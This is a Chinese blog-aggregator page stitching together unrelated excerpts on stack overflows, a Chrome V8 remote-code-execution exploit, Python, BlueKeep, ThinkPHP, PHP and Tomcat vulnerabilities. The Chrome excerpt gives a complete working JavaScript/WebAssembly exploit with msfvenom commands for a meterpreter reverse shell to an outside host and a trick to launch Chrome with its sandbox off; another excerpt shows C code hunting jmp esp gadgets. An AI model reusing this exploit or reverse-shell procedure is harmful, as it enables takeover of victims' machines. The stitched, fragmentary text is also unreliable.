精华内容
下载资源
问答
  • 攻击代码执行

    2018-03-30 18:26:07
    在栈空间中放置shellcode 最后把该函数的返回地址设置为我的shellcode的返回地址就能让程序返回时执行我的代码。 利用jmp esp 如果shellcode只能放到dll的缓冲区中,或者有PE重定位,载入基地址会改变,这样我们...

    直接覆盖返回地址
    在栈空间中放置shellcode 最后把该函数的返回地址设置为我的shellcode的返回地址就能让程序返回时执行我的代码。


    利用jmp esp
    如果shellcode只能放到dll的缓冲区中,或者有PE重定位,载入基地址会改变,这样我们用来覆盖return的地址就不能准确定位shellcode了。

    1. 把shellcode填入缓冲区
    2. 找到内存中任意一个jmp esp指令的地址覆盖掉原本的返回地址。
    3. 函数返回后被重定向执行jmp esp
    4. 因为这时候的esp指向了shellcode的起始地址所以会执行shellcode

    这里shellcode是从低地址到高地址存放的。
    这种shellcode用jmp esp作为跳板,这样就不用担心重定位问题了
    下面是在dll中查找该语句的函数。

    #include<windows.h>
    #include<stdio.h>
    #define DLL_NAME L"user32.dll"
    void main()
    {
        BYTE* ptr;
        int position, address;
        HINSTANCE handle;
        BOOL done_flag = FALSE;
        handle = LoadLibrary(DLL_NAME);//loadLibrary函数默认是宽字符,用TEXT("string")或者L"string"
        if (!handle)
        {
            printf("load dll erro!");
            exit(0);
        }
        ptr = (BYTE*)handle;//转化指针类型用来控制指针++所指向的位置
        for (position = 0; !done_flag; position++)//用position来表示偏移
        {
            try
            {
                if (ptr[position] == 0xFF && ptr[position + 1] == 0xE4)//0xffe4是jmp esp的机器码
                {
                    int address = (int)ptr + position;//输出地址要强制转化为int
                    printf("%x\n", address);
                }
            }
            catch (...)
            {
                int address = (int)ptr + position;
                printf("end of 0x%x", address);
                done_flag = TRUE;
            }
        }
    }

    存放shellcode
    如何安全地存放shellcode也是一个重要的问题
    存放的一般方法:
    1. 存放在缓冲区中例如buff[44]存进去很显然缺点是shellcode必须足够小
    2.放在返回地址之后,这样可以存放大量代码,但是会破坏原程序尽量不要用的好
    3.放在esp上边注意要用一部分空白来填充不然入栈指令会破坏shellcode
    除了jmp esp之外,mov eax,esp jmp eax也能达到跳转的目的


    碰运气
    如果不允许使用jmp而静态覆盖地址来覆盖又不太准确,这时候可以淹没一大片内存区域把shellcode放到一大片nop后面这样如果程序会走到任意一个nop这里就会执行shellcode了
    用一大片返回地址来覆盖真正的返回地址,总有一个会命中的

    补充:strcat(*str1,*str2)把str2链接到str1后面(中间没有\0) 一般情况下str1是在缓冲区中的
    这就给我们的溢出构造了条件


    展开全文
  • Chrome远程代码执行

    2021-04-16 04:36:38
    未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止...

    Chrome远程代码执行复现

    漏洞简介

    Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。

    Google Chrome 浏览器默认开启沙盒保护模式。

    影响范围

    Google Chrome < = 89.0.4389.114

    使用Chrome内核的其他浏览器。

    利用条件

    关闭沙箱模式 -no-sandbox

    漏洞复现

    首先我们生成shellcode

    msfvenom -a x64 -p windows/x64/exec CMD="msg.exe administrator hi" EXITFUNC=thread -f num
    

    使用msg给发送消息
    在这里插入图片描述

    修改poc,在shellcode区域写入自己生成的shellcode

    
    <script>
        function gc() {
            for (var i = 0; i < 0x80000; ++i) {
                var a = new ArrayBuffer();
            }
        }
        let shellcode = [shellcode 区域];
        var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
        var wasmModule = new WebAssembly.Module(wasmCode);
        var wasmInstance = new WebAssembly.Instance(wasmModule);
        var main = wasmInstance.exports.main;
        var bf = new ArrayBuffer(8);
        var bfView = new DataView(bf);
        function fLow(f) {
            bfView.setFloat64(0, f, true);
            return (bfView.getUint32(0, true));
        }
        function fHi(f) {
            bfView.setFloat64(0, f, true);
            return (bfView.getUint32(4, true))
        }
        function i2f(low, hi) {
            bfView.setUint32(0, low, true);
            bfView.setUint32(4, hi, true);
            return bfView.getFloat64(0, true);
        }
        function f2big(f) {
            bfView.setFloat64(0, f, true);
            return bfView.getBigUint64(0, true);
        }
        function big2f(b) {
            bfView.setBigUint64(0, b, true);
            return bfView.getFloat64(0, true);
        }
        class LeakArrayBuffer extends ArrayBuffer {
            constructor(size) {
                super(size);
                this.slot = 0xb33f;
            }
        }
        function foo(a) {
            let x = -1;
            if (a) x = 0xFFFFFFFF;
            var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
            arr.shift();
            let local_arr = Array(2);
            local_arr[0] = 5.1;//4014666666666666
            let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
            arr[0] = 0x1122;
            return [arr, local_arr, buff];
        }
        for (var i = 0; i < 0x10000; ++i)
            foo(false);
        gc(); gc();
        [corrput_arr, rwarr, corrupt_buff] = foo(true);
        corrput_arr[12] = 0x22444;
        delete corrput_arr;
        function setbackingStore(hi, low) {
            rwarr[4] = i2f(fLow(rwarr[4]), hi);
            rwarr[5] = i2f(low, fHi(rwarr[5]));
        }
        function leakObjLow(o) {
            corrupt_buff.slot = o;
            return (fLow(rwarr[9]) - 1);
        }
        let corrupt_view = new DataView(corrupt_buff);
        let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
        let idx0Addr = corrupt_buffer_ptr_low - 0x10;
        let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
        let delta = baseAddr + 0x1c - idx0Addr;
        if ((delta % 8) == 0) {
            let baseIdx = delta / 8;
            this.base = fLow(rwarr[baseIdx]);
        } else {
            let baseIdx = ((delta - (delta % 8)) / 8);
            this.base = fHi(rwarr[baseIdx]);
        }
        let wasmInsAddr = leakObjLow(wasmInstance);
        setbackingStore(wasmInsAddr, this.base);
        let code_entry = corrupt_view.getFloat64(13 * 8, true);
        setbackingStore(fLow(code_entry), fHi(code_entry));
        for (let i = 0; i < shellcode.length; i++) {
            corrupt_view.setUint8(i, shellcode[i]);
        }
        main();
    </script>
    

    保存为 shell.html 文件
    在这里插入图片描述

    使用 关闭沙箱启动 chrome
    在这里插入图片描述

    打开 我们的shell.html文件

    在这里插入图片描述

    我们已经成功的执行 msg 命令

    我们设置一个快捷方式让它能双击就自启动

    我们编辑快捷方式, 在目标位置写入如下

    在这里插入图片描述

    C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe -no-sandbox file:///C:/Users/Administrator/Desktop/shell.html
    

    这样双击打开 shell.html文件的时候 就自动的关闭沙箱启动

    直接打开即可弹出消息

    在这里插入图片描述

    接下来我们使用shellcode 上线msf

    生成反弹shell的shellcode

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.143 lport=4444 -f csharp -o payload.txt 
    

    在这里插入图片描述

    修改shell.html的shellcode部分

    在这里插入图片描述

    msf开启监听

    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LHOST 192.168.10.143
    msf6 exploit(multi/handler) > run

    在这里插入图片描述

    关闭沙箱打开,我们的 shell.html

    在这里插入图片描述

    在这里插入图片描述

    我们已经成功拿到了主机的一个meterpreter会话

    在这里插入图片描述

    展开全文
  • 近日,Python 软件基金会(PSF)释出 Python3.8.8和3.9.2版本,该版本主要修复了两个值得注意的安全漏洞,其中一个名为“CVE-2021-3177”的漏洞容易被攻击者远程利用,基于代码执行可让计算机脱机。乍一看,让计算机...

    近日,Python 软件基金会(PSF)释出 Python3.8.8 和 3.9.2  版本,该版本主要修复了两个值得注意的安全漏洞,其中一个名为“CVE-2021-3177”的漏洞容易被攻击者远程利用,基于代码执行可让计算机脱机。

    乍一看,让计算机脱机并不是什么大事,不过,倘若真的被有心之人利用该漏洞,那么,使用 Python 的用户难免会有一段糟心的体验。

    对此,在 Python3.8.8 和或 3.9.2 RC 版本刚刚发布三天之后,在部分用户对安全漏洞担忧的压力下,新版 Python 加快了发布的进程。同时,PSF 敦促 Python 用户尽快将系统升级到 Python 3.8.8 或 3.9.2,特别是需要解决被跟踪为 CVE-2021-3177 的远程代码执行(RCE)漏洞。

    Python 发布团队表示:"自从宣布 Python 3.8.8 和 3.9.2 RC 版本发布以来,我们收到了来自终端用户的一些关于 CVE-2021-3177 安全方面的询问,并敦促我们加快最终版本的发布。”

    具体的漏洞在于,Python 3.x 到 3.9.1 的 ctypes/callproc.c 中 PyCArg_repr 具有缓冲溢出,这可能导致远程代码执行。

    它也会影响到 "接受浮点数作为不信任的输入的 Python 应用程序,如 c_double. param 的1e300 参数所示。

    该 Bug 的发生是因为不安全地使用了"sprintf"。影响之所以广泛,因为 Python 已预装安装到了多个 Linux 发行版和 Windows 10 系统中。

    当前,各种 Linux 发行版(如 Debian)已经向后移植了安全补丁,以确保屏蔽内置版本的 Python。

    RedHat 也发布公告表示,该漏洞是常见的内存缺陷。“在 Python 内提供的 ctypes 模块中发现了基于堆栈的缓冲区溢出。使用 ctypes 而不仔细验证传递给它的输入的应用程序可能容易受到此漏洞的攻击,这将允许攻击者通过缓冲区溢出并使应用程序奔溃。”

    5ff26860a701

    同时红帽也针对自家的版本进行了安全版本说明:

    5ff26860a701

    虽然远程代码执行漏洞是一则坏消息,不过,红帽官方指出这个漏洞带来的最大威胁是对系统可用性的威胁,这意味着攻击者可能只能发动拒绝服务攻击,简单来讲,就是让计算机停止提供服务。

    不过,为了避免一些不必要的麻烦,还是呼吁大家尽快升级。

    Python 新版下载地址:https://www.python.org/downloads/

    展开全文
  • 2019年9月7日凌晨,深信服安全团队监测到关于CVE-2019-0708相关情报,该情报披露CVE-2019-0708漏洞利用代码,该EXP可以通过RDP协议进行远程代码执行攻击。官方描述此漏洞相关危害可参考2017年WannaCry事件,深信服...

    d4c01c7f7edf2bd8b0b5f05d09d39c4c.png

    2019年9月7日凌晨,深信服安全团队监测到关于CVE-2019-0708相关情报,该情报披露CVE-2019-0708漏洞利用代码,该EXP可以通过RDP协议进行远程代码执行攻击。官方描述此漏洞相关危害可参考2017年WannaCry事件,深信服强烈建议用户及时安装补丁以避免受到损失。

    漏洞名称Remote Desktop Protocol漏洞

    威胁等级:严重

    影响范围:Windows XP;Windows 7 ;Windows Server 2003;Windows Server 2008;Windows Server 2008 R2

    漏洞类型:任意代码执行漏洞

    利用难度:容易

    b96fb676f90c8f2fecd8dce41395af83.png

    漏洞概述

    CVE-2019-0708,属于任意代码远程执行漏洞,当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时,即可以触发该漏洞。此漏洞属于预身份验证,无需用户交互,成功利用此漏洞的攻击者可以安装应用程序,查看、更改或删除数据或创建具有完全用户权限的新账户。

    由于该漏洞可能导致的后果较为严重,今年5月份,深信服安全团队在追踪到该漏洞情报时已经第一时间向广大用户推送预警,并提供相应的防范措施:

    漏洞预警 | Remote Desktop Protocol任意代码执行漏洞(CVE-2019-0708)

    目前,由于EXP的公开发布,恶意攻击者还很有可能利用该漏洞编写定制的恶意软件, 利用此漏洞的恶意软件传播影响引发类似2017年WannaCry恶意软件遍布全球的事件,广大用户需要更加警惕利用该漏洞的恶意软件的出现,提前做好预防措施。

    6424b5c31e76bcce5a8fa5e847f07241.png

    漏洞分析

    成功利用漏洞的前提是将名称为“MS_T120”的静态信道成功绑定到正常信道以外。由于微软官方在内部会使用一个名为MS_T120的信道,因此此信道理论上不应该接收任意消息。

    RDP的内部组件有很多,包括svchost.exe中的几个用户模式的dll,以及几个内核模式的驱动程序。漏洞触发的原因是攻击者在MS_T120信道上发送消息,这将导致termdd.sys驱动程序中触发一个双重释放漏洞(free-after-free)。

    在完成RDP协议的握手过程后,将开始向已经绑定的各个信道中发送消息。MS_T120信道的消息是由用户模式组件——rdpwsx.dll进行管理,该dll创建一个线程,该线程将在函数rdpwsx!IoThreadFunc中进行循环,通过I/O端口读取消息。

    756acb5f9214d44bdbc162665308ec7a.png

    数据通过I/O数据包传入后,将进入rdpwsx!MCSPortData 函数进行处理:

    b5ce503c9f5fc6db9dca3345d35697e6.png

    从函数中可以看到,在rdpwsx!MCSPortData 函数中,有两个opcode:0x0和0x2。如果opcode为0x2,则调用rdpwsx!HandleDisconnectProviderIndication函数执行清理动作,然后使用rdpwsx!MCSChannelClose关闭通道。

    d8bd49c1858a9215310b6121223bc0b5.png

    从理论上来说,发送的数据包大小都在合法范围的MS_T120消息,将会正常关闭MS_T120信道,并断开连接程序(此时opcode为0x2),并且进行清理操作,此时将不会产生远程代码执行和蓝屏崩溃的风险。如果发送的数据包大小无效,就会导致远程代码执行和拒绝服务。

    261fb10e9042764e207f929ab9c7b69d.png

    漏洞复现

    根据该EXP的发布者称,该EXP针对Windows 7和Windows Server 2008 R2 x64。深信服千里目第一时间进行了复现,证实该EXP确实可导致任意代码执行。

    该EXP被发布者在Metasploit的官方Github的Pull Request中,但尚未加载进Metasploit的官方框架中。

    426b966c489da3446deea624d6b2de5a.png

    如上图中所示,按照Metaploit的正常使用流程即可加载该EXP。RHOSTS参数指定目标主机,target参数指定目标主机的系统版本,目前只有Windows 7 和 Windows Server 2008 R2两个版本。加载EXP后,执行,即可获取目标主机的权限。

    9f0a42f588e36ce1642841738a5a2e46.png

    影响范围

    目前受影响的Windows版本:

    Microsoft Windows XP

    Microsoft Windows Server 2008 R2 for x64-based Systems SP1
    Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
    Microsoft Windows Server 2008 for x64-based Systems SP2
    Microsoft Windows Server 2008 for Itanium-based Systems SP2
    Microsoft Windows Server 2008 for 32-bit Systems SP2
    Microsoft Windows Server 2003
    Microsoft Windows 7 for x64-based Systems SP1
    Microsoft Windows 7 for 32-bit Systems SP1

    ca93d4bbebba1611b3e22b7d7202d633.png

    解决方案

    漏洞修复

    1、及时安装微软发布的安全更新补丁:

    Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

    同时针对已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新,下载地址:

    https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

    2、缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案):

    (1)若用户不需要用到远程桌面服务,建议禁用该服务。

    (2)开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。

    以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新。

    深信服解决方案

    1、深信服云眼在漏洞爆发之初,已完成检测更新,对所有用户网站探测,保障用户安全。不清楚自身业务是否存在漏洞的用户,可注册信服云眼账号,获取30天免费安全体验。

    注册地址为:http://saas.sangfor.com.cn

    2、深信服云镜在漏洞爆发的第一时间就完成从云端下发本地检测更新,部署云镜的用户只需选择紧急漏洞检测,即可轻松、快速检测此高危风险。

    3、深信服EDR漏洞规则库紧急更新,支持Remote Desktop Protocol任意代码执行漏洞(CVE-2019-0708)的检测和补丁分发,漏洞规则库版本:20190515185804。联网客户可直接在线更新。 离线规则库已在5月16日上传至深信服社区,有需要的客户请到深信服社区下载。

    4、深信服推出安全运营服务,通过以“人机共智”的服务模式帮助用户快速扩展安全能力,针对此次紧急漏洞,安全运营服务已在5月份进行漏洞检测、安全设备策略检查,目前针对此次EXP,现已再次进行漏洞检测,确保第一时间检测安全风险以及更新策略,防范此类安全风险。

    ca93d4bbebba1611b3e22b7d7202d633.png

    时间轴

    2019/5/14

    Microsoft发布安全更新公告并披露漏洞

    2019/5/15

    深信服官方微信及千里目安全实验室发布漏洞预警

    2019/5/22

    深信服千里目实验室根据漏洞跟踪分析结果发布二次漏洞预警

    2019/5/30

    深信服千里目实验室发布CVE-2019-0708攻击趋势分析

    2019/6/29

    深信服安全研究团队针对某特定版本构造出EXP,证实该漏洞影响巨大,再次发布预警

    2019/9/7

    深信服安全研究团队监测到EXP披露情报,对EXP复现验证,证实该EXP可导致服务器远程代码执行,特再次发布预警,提供解决方案给广大企业用户

    咨询与服务

    您可以通过以下方式联系我们,获取关于

    CVE-2019-0708漏洞的免费咨询及支持服务:

    1)拨打电话400-630-6430转6号线

    2)关注【深信服技术服务】微信公众号,选择“智能服务”菜单,进行咨询

    3)PC端访问深信服区 

    bbs.sangfor.com.cn,选择右侧智能客服,进行咨询

    9a96aed9721447b5382b7cf239790445.png

    展开全文
  • 代码执行

    2020-10-20 23:54:27
    代码执行 ...没有考虑用户是否能控制这个字符串,这...在这里由于攻击者可以控制部分或者所有内容传递给这些未进行严格过滤的函数,从而导致提交的内容会被作为PHP代码执行 分类 常见敏感函数(代码执行函数) eval()
  • S2-037的漏洞利用思路建立在s2-033的基础只上,还是对method没有进行过滤导致的,漏洞影响Struts 2.3.20 – Struts 2.3.28.1版本,使用到REST插件的Struts2应用,会被攻击者实现远程代码执行攻击,struts2 历次的漏洞...
  • [翻译]使用最新的代码重用攻击绕过执行流保护 梦野间 2017-5-1 17:20 2958最新的漏洞利用开始渐渐脱离基于ROP的代码重用攻击。在过去的两年里,出现了一些关于一种新的代码重用攻击的文章,Counterfeit Object-...
  • 报告编号: B6-2018-031201报告来源: 360CERT报告作者: 360CERT更新日期: 2018-03-12事件概述去年6月份微软修复了CVE–2017–8464 LNK代码执行漏洞,成功利用这个漏洞会获得与本地用户相同的用户权限,攻击者可以...
  • 苏宓出品 | CSDN(ID:CSDNnews)近日,Python 软件基金会(PSF)释出 Python 3.8.8和3.9.2 版本,该版本主要修复了两个值得注意的安全漏洞,其中一个名为“CVE-2021-3177”的漏洞容易被攻击者远程利用,基于代码执行可...
  • 然而其近期被曝存在安全漏洞,可导致服务器被接管。...该漏洞名称是CVE-2019-11043,类型是RCE(远程代码执行),严重级别是高危。PHP官方指出使用NGINX搭载PHP FPM的组合时,在部分配置下,存在漏洞被利用的风...
  • 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 目前,9月7日EXP代码已被公开发布至...
  • 概念:代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。类似我们常见的SQL注入,是将SQL语句带入数据库查询,而我们的代码注入,则是将代码注入到脚本中让...
  • 代码执行漏洞和命令执行漏洞。 二者区别是代码执行漏洞执行和操作系统命令是通过脚本来执行,而命令执行漏洞是直接调用操作系统命令。但是本人觉得这个概念好像不是很重要,反正都是代码。 示例1...
  • 命令执行和代码执行漏洞

    千次阅读 2018-12-06 22:19:15
    代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行...
  • 近日,美创安全实验室监测到PHP官方披露了Nginx + php-fpm部分配置下存在的远程代码执行高危漏洞(CVE2019-11043),攻击者可利用该漏洞对目标网站进行远程代码执行攻击。虽然此漏洞的影响面有限,但由于配置文件的...
  • 本漏洞的exp放出来快一星期了,目前网上的分析文章也出了几篇,但是大都集中于通过容器简单复现攻击过程,没有深入的分析产生原因和exp的构造原理。笔者借鉴了大牛Michał Bentkowski,也就是漏洞发现者的博客上的...
  • 成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。ThinkPHP 5.0.x–5.0.23等多个版本均受此漏洞影响。目前,该漏洞的漏洞验证代码已经公开,同时ThinkPHP官方已经发布了该漏洞的修补措施,建议用户及时...
  • 近日,国家信息安全漏洞库(CNNVD)收到关于ThinkPHP 5.0远程代码执行漏洞(CNNVD-201901-445)...成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。ThinkPHP 5.0.x–5.0.23等多个版本均受此漏...
  • 攻击者可以利用漏洞实现任意代码执行等高危操作。目前官方已经出了补丁(https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003),漏洞出现在处理请求的类中。攻击者可以控制类的...
  • 简介:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击。XMLDecoder用于将XMLEncoder创建的xml文档内容反序列化为一个Java对象,其位于java.beans包下。...
  • 代码执行漏洞

    2016-04-20 16:16:00
    代码执行是指攻击者通过浏览器或者其他客户端软件提交一些用户自己构造的php代码至服务器程序,服务器程序通过eval、assert、reg_replace等函数执行用户提交的php代码。其实,我们平时所见到的SQL注入、xss等漏洞都...
  • 远程代码执行

    千次阅读 2020-07-06 19:56:16
    Tomcat 运行在Windows 主机上,且启用了 HTTP PUT 请求方法,可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。 影响版本: Apache Tomcat 7.0.0 – 7.0.81 2、 漏洞复现 配置漏洞,...
  • 0x00 漏洞介绍F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、...攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。未授权的远程攻击者通过向该页面发送特制的请求...
  • 安全预警漏洞:ThinkPHP5远程代码执行漏洞等级:高危影响范围:thinkphp 5.x漏洞描述:框架中的Request类的存在设计缺陷导致远程代码执行漏洞,最终攻击者可利用该漏洞获取系统权限。修复方案:...
  • 一、前言2019年10月22日,在github上公开了一个关于PHP的远程代码执行漏洞。斗象智能安全CRS产品已全面支持该漏洞的检测与验证,用户可直接登陆www.riskivy.com 进行验证。二、漏洞简介此漏洞由于不正确的Nginx+...
  • ThinkPHP5中存在远程代码执行漏洞,该漏洞是由于框架的Request类中存在设计缺陷导致远程代码执行,最终攻击者可利用该漏洞获取系统权限。2.漏洞概述漏洞类型: 远程代码执行漏洞危险等级: 高危利用条件:...
  • JOP代码复用攻击

    千次阅读 2018-05-20 00:49:50
    它同样利用二进制可执行文件中已有的代码片段来进行攻击。ROP 使用的是 ret指令来改变程序的控制流,而 JOP 攻击利用的是程序间接接跳转和间接调用指令(间接 call 指令)来改变程序的控制流。当程序在执行间接跳转...
  • PHP代码执行漏洞

    2020-02-03 14:32:00
    有的应用程序中提供了一些可以将字符串作为代码执行的函数,例如PHP中的eval函数,可以将改函数的参数当做PHP代码来执行。如果对这些函数的参数控制不严格,就可能会被攻击者利用,执行恶意代码 1.eval函数 eval函数...
  • 编译:奇安信代码卫士团队Apache 软件基金会修复了影响 Apache Tomcat 的一个远程代码执行漏洞,以阻止潜在的远程攻击者利用易受攻击的服务器并控制受影响系统。ApacheTomcat 软件(也被称为 Tomcat Server)是一款...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 7,965
精华内容 3,186
关键字:

代码执行攻击